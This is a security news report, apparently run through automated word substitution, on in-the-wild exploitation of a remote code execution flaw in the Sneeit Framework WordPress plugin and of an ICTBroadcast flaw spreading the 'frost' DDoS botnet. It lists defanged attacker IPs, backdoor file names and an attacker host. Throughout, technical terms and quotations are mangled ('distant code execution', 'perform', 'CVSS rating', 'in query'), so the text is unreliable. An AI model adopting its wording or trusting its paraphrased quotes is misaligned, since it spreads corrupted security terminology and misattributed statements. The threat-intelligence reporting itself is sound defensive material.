A vital safety flaw within the Sneeit Framework plugin for WordPress is being actively exploited within the wild, per information from Wordfence.
The distant code execution vulnerability in query is CVE-2025-6389 (CVSS rating: 9.8), which impacts all variations of the plugin previous to and together with 8.3. It has been patched in model 8.4, launched on August 5, 2025. The plugin has greater than 1,700 lively installations.
“That is because of the [sneeit_articles_pagination_callback()] perform accepting person enter after which passing that by means of call_user_func(),” Wordfence stated. “This makes it potential for unauthenticated attackers to execute code on the server, which might be leveraged to inject backdoors or, for instance, create new administrative person accounts.”
In different phrases, the vulnerability might be leveraged to name an arbitrary PHP perform, similar to wp_insert_user(), to insert a malicious administrator person, which an attacker can then weaponize to grab management of the positioning and inject malicious code that may redirect website guests to different sketchy websites, malware, or spam.
Wordfence stated in-the-wild exploitation commenced on November 24, 2025, the identical day it was publicly disclosed, with the corporate blocking over 131,000 makes an attempt concentrating on the flaw. Out of those, 15,381 assault makes an attempt had been recorded over the previous 24 hours alone.
A few of the efforts embrace sending specifically crafted HTTP requests to the “/wp-admin/admin-ajax.php” endpoint to create a malicious admin person account like “arudikadis” and add a malicious PHP file “tijtewmg.php” that probably grants backdoor entry.
The assaults have originated from the next IP addresses –
185.125.50[.]59
182.8.226[.]51
89.187.175[.]80
194.104.147[.]192
196.251.100[.]39
114.10.116[.]226
116.234.108[.]143
The WordPress safety firm stated it additionally noticed malicious PHP information that include capabilities to scan directories, learn, edit, or delete information and their permissions, and permit for the extraction of ZIP information. These PHP information go by the names “xL.php,” “Canonical.php,” “.a.php,” and “easy.php.”
The “xL.php” shell, per Wordfence, is downloaded by one other PHP file known as “up_sf.php” that is designed to take advantage of the vulnerability. It additionally downloads an “.htaccess” file from an exterior server (“racoonlab[.]prime”) onto the compromised host.
“This .htaccess file ensures that entry to information with sure file extensions is granted on Apache servers,” István Márton stated. “That is helpful in circumstances the place different .htaccess information prohibit entry to scripts, for instance, in add directories.”
ICTBroadcast Flaw Exploited to Ship “Frost” DDoS Botnet
The disclosure comes as VulnCheck stated it noticed recent assaults exploiting a vital ICTBroadcast flaw (CVE-2025-2611, CVSS rating: 9.3) concentrating on its honeypot methods to obtain a shell script stager that downloads a number of architecture-specific variations of a binary known as “frost.”
Every of the downloaded variations is executed, adopted by the deletion of the payloads and the stager itself to cowl up traces of the exercise. The tip objective of the exercise is to hold out distributed denial-of-service (DDoS) assaults in opposition to targets of curiosity.
“The ‘frost’ binary combines DDoS tooling with spreader logic that features fourteen exploits for fifteen CVEs,” VulnCheck’s Jacob Baines stated. “The vital half is the way it spreads. The operator isn’t carpet bombing the web with exploits. ‘Frost’ checks the goal first and solely proceeds with exploitation when it sees the precise indicators it expects.”
As an illustration, the binary exploits CVE-2025-1610 solely after receiving an HTTP response that accommodates “Set-Cookie: person=(null)” after which a follow-on response to a second request that accommodates “Set-Cookie: person=admin.” If these markers aren’t current, the binary stays dormant and does nothing. The assaults are launched from the IP handle 87.121.84[.]52.
Whereas the recognized vulnerabilities have been exploited by varied DDoS botnets, proof factors to the newest assaults being a small, focused operation, on condition that there are fewer than 10,000 internet-exposed methods which might be inclined to them.
“This limits how giant a botnet constructed on these CVEs can get, which makes this operator a comparatively small participant,” Baines stated. “Notably, the ICTBroadcast exploit that delivered this pattern doesn’t seem within the binary, which signifies the operator has extra capabilities not seen right here.”
